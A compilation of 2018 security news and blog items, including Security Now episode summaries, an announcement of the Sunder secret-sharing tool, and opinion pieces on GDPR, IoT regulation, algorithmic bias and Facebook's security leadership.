This week we examine the recent flaws discovered in the secure Signal messaging app for desktops, the rise in DNS router hijacking, another seriously flawed consumer router family, Microsoft Spectre patches for Win10's April 2018 feature update, the threat of voice assistant spoofing attacks, the evolving security of HTTP, still more new trouble with GPON routers, Facebook's Android app mistake, BMW's 14 security flaws and some fun miscellany. Then we examine the news of the next-generation of Spectre processor speculation flaws and what they mean for us.

Hosts: Steve Gibson and Leo Laporte

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6.

Bandwidth for Security Now is provided by CacheFly.

Sponsors:

In time for hacking season, the US has no cybersecurity coordinator

Picture the scene: John Bolton stands proudly against a backdrop of an American flag, smiling beneath his pruriently confrontative mustache, dusting his hands off as befits a man who's just completed a task of wistfully virile middle-management.

John Bolton just eradicated the White House positions (and people) who would stand between the United States and cyberattacks against our voting processes, our infrastructure and the tatters of our democracy. John Bolton grips his red stapler. John Bolton is in his happy place.

SN 663: Ultra-Clever Attacks

This week we will examine two incredibly clever, new (and bad) attacks named eFail and Throwhammer. But first we catchup on the rest of the past week's security and privacy news, including the evolution of UPnProxy, a worrisome flaw discovered in a very popular web development platform, the 1st anniversary of EternalBlue, the exploitation of those GPON routers, this week's disgusting security head shaker, a summary of the RSA conference's security practices survey, the appearance of persistent IoT malware, a significant misconception about hard drive failure, an interesting bit of listener feedback... then a look at two VERY clever new attacks.

We invite you to read the show notes!

Hosts: Steve Gibson and Leo Laporte

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6.

Bandwidth for Security Now is provided by CacheFly.

Sponsors:

California teen phished his teachers to change grades

Phishing attacks have been a key part of some of the most high-profile hacks in recent years, but they're also used in smaller, less diabolical schemes as well. KTVU reports that a student at Ygnacio Valley High School in California used a phishing scam to access the school district's computer system and change a number of students' grades. He was arrested last week on 14 felony counts.

Via: Gizmodo

Meet Sunder, a New Way to Share Secrets

The moment a news organization is given access to highly sensitive materials—such as the Panama Papers, the NSA disclosures or the Drone Papers—the journalist and their source may be targeted by state and non-state actors, with the goal of preventing disclosures. How can whistleblowers and news organizations prepare for the worst?

The Freedom of the Press Foundation is requesting public comments and testing of a new open source tool that may help with this and similar use cases: Sunder, a desktop application for dividing access to secret information between multiple participants.

Sunder is not yet ready for high stakes use cases. It has not been audited and is alpha-quality software. We are looking for early community feedback, especially from media organizations, activists, and nonprofits.

While Sunder is a new tool that aims to make secret-sharing easy to use, the underlying cryptographic algorithm is far from novel: Shamir's Secret Sharing was developed in 1979 and has since found many applications in security tools. It divides a secret into parts, where some or all parts are needed to reconstruct the secret. This enables the conditional delegation of access to sensitive information. The secret could be social media account credentials, or the passphrase to an encrypted thumb drive, or the private key used to log into a server.

Sunder is currently available for Mac and Linux, and in source code form. See the documentation for installation and usage instructions. We also invite you to complete a short survey which will influence the future direction of this tool.

If you are interested in getting involved in development, we welcome your contributions! Please especially take a look at issues marked "easy" or "docs". Sunder is based on the open source RustySecrets library, which is also open to new contributors.

Sunder screenshot
Sunder allows you to divide a secret into shares, a certain number of which are required to reconstruct it


How could Sunder be useful for journalists, activists and whistleblowers?

Until a quorum of participants agrees to combine their shares (the number is configurable, e.g., 5 out of 8), the individual parts are not sufficient to gain access, even by brute force methods. This property makes it possible to use Sunder in cases where you want to disclose a secret only if certain conditions are met.

The most frequently cited example is disclosure upon an adverse event. Let's say an activist's work is threatened by powerful interests. She provides access to an encrypted hard drive that contains her research to multiple news organizations. Each receives a share of the passphrase, under the condition that they only combine the shares upon her arrest or death, and that they take precautions to protect the shares until then.

Secret sharing can also used to protect the confidentiality of materials over a long running project. An example would be a documentary film project accumulating terabytes of footage that have to be stored safely. By "sundering" the key to an encrypted drive containing archival footage, the filmmaking team could reduce the risk of accidental or deliberate disclosure.

But most importantly, we want to hear what you think. Please give Sunder a spin by downloading one of the releases and following the documentation, and please take our survey!


Disclaimer

As noted above, Sunder is still alpha quality software. It's very possible that this version has bugs and security issues, and we do not recommend it for high stakes use cases. Indeed, Sunder and the underlying library have not received a third party audit yet.

Furthermore, any secret sharing implementation is only as robust as the operational security around it. If you distribute or store shares in a manner that can be monitored by an adversary (e.g., online without the use of end-to-end encryption) this could compromise your security.


Inquiries

For inquiries, please contact us at sunder@freedom.press.



Credits

Sunder was primarily developed by Gabe Isman and Garrett Robinson. Conor Schaefer has acted as a maintainer and release manager; Lilia Kai recently also joined the project as a maintainer. RustySecrets was developed by the RustySecrets team. Conversations between Ed Snowden and Frederic Jacobs were the original impetus for the project.

SN 662: Spectre – NextGen

This week we begin by updating the status of several ongoing security stories: Russia vs Telegram, DrupalGeddon2, and the return of RowHammer. We will conclude with MAJOR new bad news related to Spectre. We also have a new cryptomalware, Twitter's in-the-clear passwords mistake, New Android 'P' security features, a crazy service for GDPR compliance, Firefox's sponsored content plan, another million routers being attacked, More deliberately compromised JavaScript found in the wild, a new Microsoft Meltdown mistake, a comprehensive Windows command reference, and signs of future encrypted Twitter DMs.

We invite you to read our show notes.

Hosts: Steve Gibson and Leo Laporte

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6.

Bandwidth for Security Now is provided by CacheFly.

Sponsors:

‘World of Warcraft’ cyberattacker sentenced to year in prison

One World of Warcraft player is paying the price for taking a virtual rivalry too far. A US federal court has sentenced Romanian man Calin Mateias to spend a year in federal prison after he pleaded guilty to launching a distributed denial of service attack against WoW's servers in response to being "angered" by one player. The 2010 traffic flood knocked thousands of players offline and cost Blizzard $30,000 (which Mateias repaid in April) in recovery expenses.

Source: NBC Los Angeles

Chinese spies linked to decade-long hacking campaign

China's long-running hacking efforts may be more extensive than first thought. Security researchers at ProtectWise's 401TRG team have determined that a long series of previously unconnected attacks are actually part of a concerted campaign by Chinese intelligence officials. Nicknamed the Winnti umbrella, the effort has been going on since "at least" 2009 and has struck game companies (like Nexon and Trion) and other tech-driven businesses to compromise political targets.

Via: Ars Technica

Source: 401TRG

Algorithmic discrimination: A coming storm for security?

“If you don’t understand algorithmic discrimination, then you don’t understand discrimination in the 21st century.”

Bruce Schneier’s words, which came at the end of his wide-ranging session at RSA Conference last week, continued to echo in my ears long after I returned from San Francisco. Schneier, the well-known security expert, author and CTO of IBM Resilient, was discussing how technologists can become more involved in government policy, and he advocated for joint computer science-law programs in higher education.

“I think that’s very important. Right now, if you have a computer science-law degree, then you become a patent attorney,” he said. “Yes, it makes you a lot of money, but it would be great if you could work for the ACLU, the Sothern Poverty Law Center and the NAACP.”

Those organizations, he argued, need technologists that understand algorithmic discrimination. And given some recent events, it’s hard to argue with Schneier’s point. But with all of the talk at RSA Conference this year about the value of machine learning and artificial intelligence, just as in previous years, I wondered if the security industry truly does understand the dangers of bias and discrimination, and what kind of problems will come to the surface if it doesn’t.

Inside the confines of the Moscone Center, algorithms were viewed with almost complete optimism and positivity. Algorithms, we’re told, will help save time and money for enterprises that can’t find enough skilled infosec professionals to fill their ranks.

But when you step outside the infosec sphere, it’s a different story. We’re told how algorithms, in fact, won’t save us from vicious conspiracy theories and misinformation, or hate speech and online harassment, or any number of other negative factors afflicting our digital lives.

If there are any reservations about machine learning and AI, they are generally limited to a few areas such as improper training of AI models or how those models are being used by threat actors to aid cyberattacks. But there’s another issue to consider: how algorithmic discrimination and bias could negatively impact these models.

This isn’t to say that algorithmic discrimination will necessarily afflict cybersecurity technology in a way that reveals racial or gender bias. But for an industry that so often misses the mark on the most dangerous vulnerabilities and persistent yet preventable threats, it’s hard to believe infosec’s own inherent biases won’t somehow be reflected in the machine learning and AI-based products that are now dominating the space.

Will these products discriminate against certain risks over more pressing ones? Will algorithms be designed to prioritize certain types of data and threat intelligence at the expense of others, leading to data discrimination? It’s also not hard to imagine racial and ethnic bias creeping into security products with algorithms that demonstrate a predisposition toward certain languages and regions (Russian and Eastern Europe, for example). How long will it take for threat actors to pick up on those biases and exploit them?

It’s important to note that in many cases outside the infosec industry, the algorithmic havoc is wreaked not by masterful black hats and evil geniuses but by your average internet trolls and miscreants. They simply spent enough time studying how, for example, YouTube functions on a day-to-day basis and flooded the systems with content to figure out how they could weaponize search engine optimization.

If Google can’t construct algorithms to root out YouTube trolls and prevent harassers from abusing the sites’ search and referral features, then why do we in the infosec industry believe that algorithms will be able to detect and resolve even the low-hanging fruit that afflicts so many organizations?

The question isn’t whether the algorithms will be flawed. These machine learning and AI systems are built by humans, and flaws come with the territory. The question is whether they will be – unintentionally or purposefully – biased, and if those biases will be fixed or reinforced as the systems learn and grow.

The world is full of examples of algorithms gone wrong or nefarious actors gaming systems to their advantage. It would be foolish to think infosec will somehow be exempt.

The post Algorithmic discrimination: A coming storm for security? appeared first on Security Bytes.

GDPR deadline: Keep calm and GDPR on

You may know that the GDPR deadline — May 25, 2018 — is almost upon us.

In less than a month, the European Union will begin enforcing its new General Data Privacy Regulation, or GDPR. Some companies will face disabling fines, as much as 20 million euros, or 4% of global gross revenue, whichever is higher. Some companies will have spent millions to be compliant with the new rules on protecting the privacy of EU data subjects — anyone resident in the EU — while some companies will have spent nothing when the GDPR deadline arrives.

For example, according to a survey by technology non-profit CompTIA, U.S. companies are not doing well with GDPR preparations. They found that 52% of the 400 U.S. companies they surveyed are still either exploring how GDPR is applicable to their business, trying to determine whether GDPR is a requirement for their business, or are simply unsure. The research also revealed that  that just 13% of firms say they are fully compliant with GDPR, 23% are “mostly compliant” and 12% claim they are “somewhat compliant.”

That is not an isolated finding. A poll released this month by Baker Tilly Virchow Krause, LLP, revealed that 90% of organizations do not have controls in place to be compliant with GDPR before the deadline.

GDPR deadline versus Y2K

In four weeks, once the GDPR deadline has passed, will the privacy Armageddon will be upon us?

Probably not.

For IT and infosec pros of a certain age, the GDPR deadline echoes the panic of an earlier and more innocent time: January 1, 2000.

I certainly remember that time.

Also known as the year 2000 bug, the Y2K challenge, like GDPR, represented a problem that would require massive amounts of human, computing and financial resources to solve — and with a hard deadline that could not be argued with. The practice of coding years with just the last two digits in dates was clearly going to cause problems, and created its own industry for remediation of those problems in legacy systems of all types across the globe.

Much of the news coverage leading up to the millennium’s end focused on its impact on the world in the form of computers that could react unpredictably to the calendar change, especially all the embedded computers that controlled (and still control) so much of the modern landscape.

There were worries about whether air traffic control systems could cope with Y2K, worries that embedded computer-heavy airplanes would fall out of the sky, electric grids would fail, gas pumps would stop pumping and much worse was in store unless all systems were remediated.

The late software engineer Edward Yourdon, author of “Time Bomb 2000” and one of the leading voices of Y2k preparation, told me he had moved to a remote rural location where he was prepared to function without computers until the fallout cleared.

The GDPR deadline, on the other hand, represents an artificial milestone. After this date, if a company’s practices are not in line with the regulation and something happens as a result of those practices, the company may be fined — but the wheels won’t fall off unexpectedly, nor will any systems fail catastrophically and without notice.

Some of the big U.S. companies that will be affected by the GDPR, like Facebook, Twitter, Microsoft and many others, have already taken action. And many companies that believe they won’t be affected, or that aren’t sure, are taking the “wait and see” approach, rather than attempting to be proactive and address, at great cost, privacy concerns before worrying about the potentially huge fines.

Both approaches will make sense, depending on the company.

It may be heresy, but there are probably many U.S. companies that don’t need to worry too much about the upcoming GDPR deadline:

  • Failing companies need not worry about GDPR. If they are having trouble keeping the lights on, a huge GDPR penalty might spell the end of the company — but that doesn’t mean the company would be prospering in a world without privacy regulations.
  • Business to business companies that do not have EU data subjects as their customers likely have little to fear from GDPR enforcement.
  • Companies that do not solicit, collect or process personally identifiable information about their EU customers should also have little to fear from GDPR enforcement.

Most notably, there are — I hope — companies that don’t need to make special preparation for the GDPR deadline because while they may not be explicitly compliant with the GDPR, they already take the principles of privacy and security seriously.

Enforcement of the GDPR begins in a month, but that doesn’t mean the headlines on May 26 will herald the levying of massive fines against GDPR violators. In time the fines will surely rain down on violators, but companies with the right attitude toward privacy can stay calm, for now.

While the magnitude of the importance of the Y2K challenge faded almost immediately after January 1, 2000, the importance of enforcing data privacy protections through the GDPR will only continue to grow after the deadline.

The post GDPR deadline: Keep calm and GDPR on appeared first on Security Bytes.

Hackers find an ‘unpatchable’ way to breach the Nintendo Switch

Security researchers from ReSwitched have discovered a Nintendo Switch vulnerability that could let hackers run arbitrary code on all current consoles. Dubbed "Fusée Gelée" ("Frozen Rocket") it exploits buggy code in the NVIDIA Tegra X1's USB recovery mode, bypassing software that would normally protect the critical bootROM. Most worrisome for Nintendo is that the bug appears to be unpatchable and could allow users to eventually run pirated games.

Via: Ars Technica

Source: Kate Tempkin (Github)

To Cyber or Not to Cyber…That is the RSAC Talk Analysis

I don’t know where you are, but the data analysis of the RSA Conference by the prestigious Cyentia Institute is amazing. They wrote algorithms to tell us what the “most important” talks are each year from 25 years of security conference data, and illustrate our industry’s trend over time. Who can forget “A top 10 topic in 2009 was PDAs”?

This is the slide that made everyone laugh, of course:

Trends going up? GDPR, Ransomware, Financial Gain and Extortion. Big Data exploded up and then trends down over the last five years.

Trends going down? BYOD, SOX, GRC, Hacktivism, Targeted Attack, Endpoint, Mobile Device, Audit, PCI-DSS, APT, Spam…

Endpoint going down is fascinating, given how a current ex-McAfee Marketing Executive war is going full-bore. RSAC 2018 Expo Protip: people working inside Crowdstrike and Cylance are hinting on the show floor how unhappy they are with noise made about a high-bar of attribution to threat actors given their actual product low-bar performance and value.

That’s just a pro doing qualitative sampling, though. Who knows how reliable sources are, so consider as well the implication of qualitative analysis.

Some cyber companies talk threat actor in the way that Lockheed-martin talks when they want to sell you their latest bomb technology. Is that bomb effective? Depends how and what we measure. Ask me about 1968 OP IGLOO WHITE spending $1B/year on technology based on threat actor discussions almost exactly like those we see in the ex-McAfee Marketing Executive company booths…

5 Common Sense Security and Privacy IoT Regulations

F-Secure invites our fellows to share their expertise and insights. For more posts by Fennel, click here

For most of human history, the balance of power in commercial transactions has been heavily weighted in favour of the seller. As the Romans would say, caveat emptor – buyer beware!

However, there is just as long a history of people using their collective power to protect consumers from unscrupulous sellers, whose profits are too often based on externalising their costs which are then borne by the society. Probably the earliest known consumer safety law is found in Hammurabi’s Code nearly 4000 years ago – it is quite a harsh example:

If a builder builds a house for someone, and does not construct it properly, and the house which he built falls in and kills its owner, then that builder shall be put to death.

However, consumer safety laws as we know them today are a relatively new invention. The Consumer Product Safety Act became law in the USA in 1972. The Consumer Protection Act became law in the UK in 1987.

Today’s laws provide for stiff penalties – for example the UK’s CPA makes product safety issues into criminal offenses liable with up to 6 months in prison and unlimited fines. These laws also mandate enforcement agencies to set standards, buy and test products, and to sue sellers and manufacturers.

So if you sell a household device that causes physical harm to someone, you run some serious risks to your business and to your personal freedom. The same is not true if you sell a household device that causes very real financial, psychological, and physical harm to someone by putting their digital security at risk. The same is not true if you sell a household device that causes very real psychological harm, civil rights harm, and sometimes physical harm to someone by putting their privacy rights at risk. In those cases, your worst case risk is currently a slap on the wrist.

This situation may well change at the end of May 2017 when the EU General Data Protection Regulation (GDPR) goes into force across the EU, and for all companies with any presence or doing business in the EU. The GDPR provides two very welcome threats that can be wielded against would-be negligent vendors: the possibility of real fines – up to 2% of worldwide turnover; and a presumption of guilt if there is a breach – it will be up to the vendor to show that they were not negligent.

However, the GDPR does not specifically regulate digital consumer goods – in other words Internet of Things (IoT) “smart” devices. Your average IoT device is a disaster in terms of both security and privacy – as our Mikko Hypponen‘s eponymous Law states: “smart device” = “vulnerable device”, or if you prefer the Fennel Corollary: “smart device” = “vulnerable surveillance device”.

The current IoT market is like the household goods market before consumer safety laws were introduced. This is why I am very happy to see initiatives like the UK government’s proposed Secure by Design: Improving the cyber security of consumer Internet of Things Report. While the report has many issues, there is clearly a need for the addition of serious consumer protection laws in the security and privacy area.

So if the UK proposal does not go far enough, what would I propose as common sense IoT security and privacy regulation? Here are 5 things I think are mandatory for any serious regulation in this area:

  1. Consumer safety laws largely work due to the severe penalties in place for any company (and their directors) who provide consumers with goods that place their safety in danger, as well as the funding and willingness of a governmental consumer protection agency to sue companies on consumers’ behalf. The same rigorous, severe, and funded structure is required for IoT goods that place consumers’ digital and physical security in danger.
  2. The danger to consumers from IoT goods is not only in terms of security, but also in terms of privacy. I believe similar requirements must be put in place for Privacy by Design, including severe penalties for any collecting, storing, and selling (whether directly, or indirectly via profiling for targeting of advertising) of consumers’ personal data if it is not directly required for the correct functioning of the device and service as seen by the consumer.
  3. Similarly, the requirements should include a strict prohibition on any backdoor, including government or law enforcement related, to access user data, usage information, or any form of control over the devices. Additionally, the requirements should include a strict prohibition on vendors providing any such information or control via “gentleman’s agreements” with a governmental or law enforcement agency/representative.
  4. In terms of the requirements for security and privacy, I believe that any requirements specifically written into law will always be outdated and incomplete. Therefore I would mandate independent standards agencies in a similar way to other internet governing standards bodies. A good example is the management of TLS certificate security rules by the CA/Browser Forum.
  5. Requirements must also deal with cases of IoT vendors going out of business or discontinuing devices and/or software updates. There must be a minimum software update duration, and in the case of discontinuation of support, vendors should be required to provide the latest firmware and update tool as Open Source to allow support to be continued by the user or a third party.

Just as there will always be ways for a determined person to hack around any physical or software security controls, people will find ways around any regulations. However, it is still better to attempt to protect vulnerable consumers than to pretend the problem doesn’t exist; or even worse, to blame the users who have no real choice and no possibility to have any kind of informed consent for the very real security and privacy risks they face.

Let’s start somewhere!

RSA Conference 2018: Fun Telco History in SF

Welcome to SF everyone! As the RSA Conference week begins, which really is a cluster of hundreds of security conferences running simultaneously for over 40,000 people converging from around the world, I sometimes get asked for local curiosities.

As a historian I feel the pull towards the past, and this year is no exception. Here are three fine examples from hundreds of interesting security landmarks in SF.

Chinese Telephone Exchange

During a period of rampant xenophobia in America, as European immigrants were committing acts of mass murder (e.g. Deep Creek, Rock Springs) against Asian immigrants, a Chinese switchboard in 1887 came to life in SF (just before the Scott Act). By 1901 it moved into a 3-tier building at 743 Washington Street. Here’s a little context for how and why the Chinese Telephone Exchange was separated from other telephone services:

Today when you visit Chinatown in SF you may notice free tea tastings are all around. This is a distant reminder of life 100 years ago, even for visitors to the Chinese Telephone Exchange, as a San Francisco Examiner report describes in 1901:

Tea and tobacco are always served to visitors, a compliment of hospitality which no Chinese business transaction is complete

At it’s peak of operation about 40 women memorized the names and switching algorithms for 1,500 lines in five dialects of Chinese, as well as English of course. Rather than use numbers, callers would ask to be connected to a person by name.

The service switched over 13,000 connections per day until it closed in 1949. Initially only men were hired, although after the 1906 earthquake only women were. Any guesses as to why? An Examiner reporter in 1901 again gives context, explaining that men used anti-competitive practices to make women too expensive to hire:

The Chinese telephone company was to put in girl operators when the exchange was refitted, and doubtless it will be done eventually. The company prefers women operators for many reasons, chiefly on account of good temper.

But when the company found that girls would be unobtainable unless they were purchased outright, and that it would be necessary to keep a platoon of armed men to guard them, to say nothing of an official chaperon to look after the proprieties, the idea of girl operators was abandoned.

“They come too high,” remarks the facetious general manager, “but in the next century we’ll be able to afford them, for girls will be cheaper then.”

Pacific Telephone Building

One of the first really tall developments in SF, which towered above the skyline (so tall it was used to fly weather warning flags and lights) for the next 40 years, were the Pacific Telephone offices. At 140 Montgomery Street, PacTel poured $4 million into their flagship office building for 2,000 women to handle the explosive growth of telephone switching services (a far cry from the 40 mentioned above at 743 Washington Street).

By 1928, the year after 140 New Montgomery was completed, the San Francisco Examiner declared “with clay from a hole in the ground in Lincoln, California, the modern city of San Francisco has come.”

It was modeled after a Gottlieb Eliel Saarinen design that lost a Chicago competition, and came to life because of the infamous local architect Timothy Pflueger. Pflueger never went to college yet left us a number of iconic buildings such as Olympic Club, Castro Theater, Alhambra Theater, and perhaps most notably for locals, a series of beautiful cocktail lounges created in the prohibition years.

AT&T Wiretap

Fast-forward to today and there are several windowless tall buildings scattered about the city, filled with automated switched connecting the city’s copper and fiber. One of particular note is 611 Folsom Street, near the latest boom in startups.

Unlike the many years of American history where telco staff would regularly moonlight by working for the police, this building gained attention for a retired member of staff who disclosed his surprise and disgust that President Bush had setup surreptitious multi-gigabit taps on telco peering links.

“What the heck is the NSA doing here?” Mark Klein, a former AT&T technician, said he asked himself.

A year or so later, he stumbled upon documents that, he said, nearly caused him to fall out of his chair. The documents, he said, show that the NSA gained access to massive amounts of e-mail and search and other Internet records of more than a dozen global and regional telecommunications providers. AT&T allowed the agency to hook into its network at a facility in San Francisco and, according to Klein, many of the other telecom companies probably knew nothing about it.

[…]

The job entailed building a “secret room” in an AT&T office 10 blocks away, he said. By coincidence, in October 2003, Klein was transferred to that office and assigned to the Internet room. He asked a technician there about the secret room on the 6th floor, and the technician told him it was connected to the Internet room a floor above. The technician, who was about to retire, handed him some wiring diagrams.

“That was my ‘aha!’ moment,” Klein said. “They’re sending the entire Internet to the secret room.”

[…]

Klein was last in Washington in 1969, to take part in an antiwar protest. Now, he said with a chuckle, he’s here in a gray suit as a lobbyist.

In some sense we’ve come a long way since 1887, tempting us to look at how different things are from technological change, and yet in other ways things haven’t moved very far at all.

Recommended Reading: Facebook’s influence on Instagram

Instagram looks like Facebook's best hope
Sarah Frier,
Bloomberg Businessweek

With all the attention on Mark Zuckerberg's visit to DC this week, it can be easy to lose sight of an important detail: Facebook also owns Instagram. Of course, this means it also has access to the photo-sharing app's massive user base. Bloomberg Businessweek has a detailed look at the relationship between the two companies as Instagram approaches 1 billion total users.

US discusses authorizing cyber attacks outside “war zone”

In a nutshell, traditional definitions of war linked to kinetic action and physical space are being framed as overly restrictive given a desire by some to engage in offensive attacks online. The head of NSA is asking whether reducing that link and authorizing cyber attack within a new definition of “war” would affect the “comfort” of those holding responsibility.

“[On offense] the area where I think we still need to get a little more speed and agility — and as Mr. Rapuano indicated it is an area that is currently under review right now — what is the level of comfort in applying those capabilities outside designated areas of hostility,” Rogers asked out loud.

“I don’t believe anyone should grant Cyber Command or Adm. Rogers a blank ticket to do whatever you want, that is not appropriate. The part I am trying to figure out is what is the appropriate balance to ensure the broader set of stakeholders have a voice.”

Rapuano also referenced challenges associated with defining “war” in the context of cyber, which can be borderless due to the interconnected nature of the internet.

“In a domain that is so novel in many respects, and for which we do not have the empirical data and experience associated with military operations per say particularly outside areas of conflict, there are some relatively ambiguous areas around ‘well what constitutes traditional military activities,'” said Rapuano. “This is something that we are looking at within the administration and we’ve had a number of discussions with members and your staffs; so that’s an area we’re looking at to understand the trades and implications of changing the current definition.”

While I enjoy people characterizing the cyber domain as novel and border-less, let’s not kid ourselves too much. The Internet has far more borders and controls established, let alone a capability to deploy more at speed, given they are primarily software based. I can deploy over 40,000 new domains with high walls in 24 hours and there’s simply no way to leverage borders as effectively in a physical world.

Even more to the point I can distribute keys to access in such a way that it spans authorities and bureaucratically slows any attempts to break in, thus raising a far stronger multi-jurisdictional border to entry than any physical crossing.

We do ourselves no favors pretending technology is always weaker, disallowing for the prospect of a shift to stronger boundaries of less cost, and forgetting that Internet engineering is not so much truly novel as a revision of prior attempts in history (e.g. evolution of transit systems).

My recent talk at AppSecCali for example points out how barbed wire combined with repeating rifles established borders faster and more effectively than the far more “physical” barriers that came before. Now imagine someone in the 1800s calling a giant field with barbed wire border-less because it was harder for them to see in the same context as a river or mountain…

Lessons in Secrets Management from a Navy SEAL

Good insights from these two paragraphs about the retired Rear Admiral Losey saga:

Speaking under oath inside the Naval Base San Diego courtroom, Little said that Losey was so scared of being recorded or followed that when the session wrapped up, the SEAL told the Navy investigator to leave first, so he couldn’t identify the car he drove or trace a path back to his home.

[…]

…he retaliated against subordinates during a crusade to find the person who turned him in for minor travel expense violations.

Holding Facebook Executives Responsible for Crimes

Interesting write-up on Vox about the political science of Facebook, and how it has been designed to avoid governance and accountability:

…Zuckerberg claims that precisely because he’s not responsible to shareholders, he is able instead to answer his higher responsibility to “the community.”

And he’s very clear, as he says in interview after interview and hearing after hearing, that he takes this responsibility very seriously and is very sorry for having violated it. Just as he’s been sorry ever since he was a first-year college student. But he’s never actually been held responsible.

I touched on this in my RSA presentation about driverless cars several years ago. My take was the Facebook management is a regression of many centuries (pre-Magna Carta). Their primitive risk control concepts, and executive team opposition to modern governance, puts us all on a path of global catastrophe from automation systems, akin to the Cuban Missile Crisis.

I called it “Dar-Win or Lose: The Anthropology of Security Evolution

It is not one of my most watched videos, that’s for certain.

It seems like talks over the years where I frame code as poetry, with AI security failures like an ugly performance, I garner far more attention. If the language all programmers know best is profanity, who will teach their machines manners?

Meanwhile, my references to human behavior science to describe machine learning security, such as this one about anthropology, fly below radar (pun intended).

Supply Chain Accountability: Will There Be a Cyber Toyota War?

Back in 2015 there was some serious consideration of why Toyota were so often used by terrorist groups the US considered their enemy. Here’s some manufacturers-gonna’-manufacture rationalization:

All of this is to show that any sort of dark alliance between Toyota and the Islamic State is completely specious. The Toyota happens to be the vehicle with the greatest utility; the color of the pickup truck is driven by Asian tastes and the fact that desert heat dictates that white cars are simply more comfortable than black ones; and that Toyota trucks are driven by ISIS is dictated more by the sheer numbers produced and a reputation for quality than some nefarious plot by a well-respected Japanese automaker to supply a terroristic organization.

Simply put: It’s practically guaranteed that any paramilitary force in the Middle East will standardize on white Toyota pickup trucks.

It’s not an unreasonable argument to make. My main quibble with that article is it says nothing about Chad. If you’re going to talk about Toyota at war, you have to at least make mention of the US role with Toyota pickups sent into battle January 2, 1987:

…no one would have ever guessed that the Toyota pickup truck would come to play an important role in warfare history. This is the little-known story of how an army comprising 400 Toyota pickups outgunned, outsmarted, and outmaneuvered a superior force equipped with tanks and aircraft.

[…]

In the brutal engagement with 1,200 Libyan soldiers and 400 members of the Democratic Revolutionary Council militia, the Chadian army and its Toyota pickups made mincemeat of the Libyan stronghold in Fada. At the end of the day, the Libyan armored brigade in Fada had lost 784 soldiers, 92 T-55 battle tanks, and 33 BMP-1 infantry fighting vehicles.

Chadian losses, on the other hand, were minimal: 18 soldiers and 3 Toyota pickup trucks. January 3 and 4 saw the Libyan Air Force try to annihilate the Chadian soldiers and their trucks, but all bombing attempts failed thanks to the outstanding mobility of the Toyota Hilux.

Ok so let’s be frank. It is preposterous to say no one would have ever guessed superior technology would come to play an important role in warfare history. That is literally what happens in every major conflict. Warriors don’t ignore advantages. So there’s a very good argument against that perspective up top, which is that Toyota have for many decades been supplying exactly the technology desired in warfare, and watching the global purchases turn into military purposes.

“Don’t worry about transport, my good bud Habre, we’re flying Toyotas in tonight for you by C-130”

Whether Toyota can or should stop product flow somewhere along the route is another story. Consider for example that their pickup trucks get assembled in San Antonio, Texas and Baja California, Mexico. Hyundai converted into VBIED were said to have been the result of a local manufacturing plant simply overrun by military forces. How difficult control of Toyota’s supply chain is further can be demonstrated by American companies who lately have been boasting of re-directing Toyota machines straight into warfare:

Battelle, an applied sciences and technology company based in Columbus, Ohio has put out a video explaining how it turns ordinary vehicles into extraordinary ones. According to the company, it’s been creating what it calls “non-standard commercial vehicles” since 2004. Battelle sources Toyota HiLux pickup trucks and Land Cruiser sport utility vehicles, as well as Ford Ranger pickups as a baseline to create their “non-standard” vehicles.

Non-standard sounds far better than dark alliance or nefarious plot, I have to admit. Ultimately, though, it comes backs to Toyota being on top of its total supply chain and helping investigate use cases of their supply that violates law or its values.

On the one hand releasing product into the wild (e.g. right to repair) creates freedom from corporate control, on the other hand corporations have duty to reduce harms that result from their creations. Balance between those two ends is best, as history tells us it’s never going to be perfect on either end of the spectrum.

See also: “[Recipient of President Reagan’s product shipments] sentenced to life for war crimes

“As a country committed to the respect for human rights and the pursuit of justice, this is also an opportunity for the United States to reflect on, and learn from, our own connection with past events in Chad,” [Secretary of State Kerry] said, apparently referring to U.S. support for Habre in the 1980s to help assuage the influence of Libya’s Moammar Gadhafi.

UK Army Museum Reveals Hidden World of the Special Forces

The National Army Museum in Chelsea, London has freshly opened a new exhibit for you to see if you can see what you’re not supposed to see:

The exhibition looks at the work of [five elite] units as well as the skills and dedication needed to make the cut.

From real-life events, like the Iranian Embassy Siege, to portrayals in popular culture, come and explore the hidden world of the Special Forces.

With just 85 views so far of their promotional video, I’m going to sneak out on a limb here to say coming out of the shadows might be harder than the museum thinks.

Will Facebook CSO Face Jail Time?

Russell Wasendorf allegedly stole over $215 million from his customers and falsified bank statements to cover it up. Bernie Madoff was arrested for losing $50 billion while running ponzi schemes. Jeffrey Skilling was initially sentenced to 24 years in prison and fined $45 million for recording projected future profits as actual profits.

Is the Facebook CSO becoming the new Enron CFO story?

After all, the CSO in question is known for declaring projected future plans as actual security features. When he joined Yahoo to take his first ever job as CSO (also breached catastrophically during his short time there) he pre-announced end-to-end encryption was coming. He never delivered and instead quietly quit to take another shot at being CSO…at Facebook.

It’s serious food for thought when reading about the historic breaches of Facebook that began around the time he joined and continued for years under his watch. It’s been said he’s only giving lip service to users’ best interests (given his failed Yahoo delivery) and more recently it’s been said adversaries to the US targeted him as a “coin operated” asset (given his public hostility to US government).

At this point it will be interesting to see if standing idly for so long and allowing mounting harms to customers, personally profiting from damages done, will lead to any kind of penalty akin to Skilling’s.

Today, given what we know… I think we understand that we need to take a broader view of our responsibility,” [CEO] said.

“That we’re not just building tools, but that we need to take full responsibility for the outcomes of how people use those tools as well.”

[…]

Facebook has now blocked the facility.

“It is reasonable to expect that if you had that [default] setting turned on, that in the last several years someone has probably accessed your public information in this way,” Mr Zuckerberg said.

The last several years represent the tenure of the CSO in question. “Today, given what we know?” That responsibility was no secret before he joined, and it should not have taken so many years to come to the realization that a CSO is meant to stop harm instead of profiting from it. So the question becomes what is next for the man whose first and only two attempts at being a CSO have ended in the largest breaches in history.

Finding subdomains for open source intelligence and pentest

Finding subdomains for open source intelligence and pentest

